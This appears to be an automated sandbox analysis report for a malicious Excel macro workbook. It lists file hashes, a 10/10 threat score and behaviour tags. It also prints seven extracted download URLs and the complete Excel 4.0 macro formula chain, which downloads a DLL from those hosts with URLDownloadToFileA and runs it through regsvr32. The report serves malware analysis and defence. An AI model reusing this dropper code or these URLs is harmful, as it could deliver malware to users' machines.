Overview

overview

10

Static

static

10

f42401dda8...0.xlsm

windows7-x64

10

f42401dda8...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    f42401dda8df773b89a952bc1c69321d4e56fb0fb41b6f0e097fc7a6748ad7b0

  • Size

    73KB

  • Sample

    241120-ahsrlawkew

  • MD5

    2f6ed08006f357d51e46590697c76a65

  • SHA1

    5ad124b762f88e8d10405719491a6c26b125fce1

  • SHA256

    f42401dda8df773b89a952bc1c69321d4e56fb0fb41b6f0e097fc7a6748ad7b0

  • SHA512

    21369a8cc4fbf3775b1fb59273fe127a6a4606a120c8137f654a7151a6612f21d805c7e610396afa8214ddf15369559e56fdf5ea1e888034b8dbeb74c9e47141

  • SSDEEP

    1536:j1iiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVzc:j1iiCtzSmICpH7OZuvZGsMU

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://andjello.net/wp-includes/O74XNLzsodp/

http://andrewpharma.com/wp-includes/d8yxEkWRUU/

http://anneferrier.com/logs/Ia7oz193SZbb5N/

http://anaforainc.com/media/tUKKnlCd0QJDxWO/

http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/

http://amdrolls.com/Template/goRpY/

https://www.anagramme.net/admin_files/rOzDUUhjSMh/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andjello.net/wp-includes/O74XNLzsodp/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/d8yxEkWRUU/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anneferrier.com/logs/Ia7oz193SZbb5N/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anaforainc.com/media/tUKKnlCd0QJDxWO/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amdrolls.com/Template/goRpY/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.anagramme.net/admin_files/rOzDUUhjSMh/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://andjello.net/wp-includes/O74XNLzsodp/

Targets

    • Target

      f42401dda8df773b89a952bc1c69321d4e56fb0fb41b6f0e097fc7a6748ad7b0

    • Size

      73KB

    • MD5

      2f6ed08006f357d51e46590697c76a65

    • SHA1

      5ad124b762f88e8d10405719491a6c26b125fce1

    • SHA256

      f42401dda8df773b89a952bc1c69321d4e56fb0fb41b6f0e097fc7a6748ad7b0

    • SHA512

      21369a8cc4fbf3775b1fb59273fe127a6a4606a120c8137f654a7151a6612f21d805c7e610396afa8214ddf15369559e56fdf5ea1e888034b8dbeb74c9e47141

    • SSDEEP

      1536:j1iiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVzc:j1iiCtzSmICpH7OZuvZGsMU

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks